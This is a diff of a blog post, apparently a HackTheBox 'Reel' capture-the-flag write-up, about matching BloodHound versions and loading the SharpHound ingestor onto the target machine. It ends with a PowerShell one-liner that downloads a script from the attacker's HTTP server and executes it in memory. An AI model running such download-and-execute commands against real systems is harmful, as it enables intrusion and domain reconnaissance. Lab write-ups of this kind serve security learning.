atorralba/atorralba.github.io/_posts/2018-11-07-HackTheBox-Reel.md

 ### About versions, CSVs and JSONs

 Now, I'll save you some time and tell you a little spoiler.
 The version of BloodHound installed on Reel is an old one (`1.5.2`), which used CSV as the format for the collected data.
-If you happened to install the most recent BloodHound on your Kali, this data won't be accepted by it, since BloodHound 2 onwards expects data in JSON format.
-So you have two options: either you install BloodHound 1.5.2 on your Kali, or you load into Reel BloodHound's most recent Ingestor.
+If you happened to install the most recent BloodHound on your attacker box, this data won't be accepted by it, since BloodHound 2 onwards expects data in JSON format.
+So you have two options: either you install BloodHound 1.5.2 on your box, or you load BloodHound's most recent Ingestor into Reel.
 I tried both ways, and I think the second one is easier.
 So let's do that.

-After cloning latest BloodHound version from GitHub on our attacker box, we can just use python's `SimpleHTTPServer` to serve `Ingestors/SharpHound.ps1` and get it from Reel:
+After cloning the latest BloodHound version from GitHub on our attacker box, we can just use python's `SimpleHTTPServer` to serve `Ingestors/SharpHound.ps1` and get it from Reel:

 ```
 > IEX (New-Object System.Net.WebClient).DownloadString('http://10.10.12.157/SharpHound.ps1')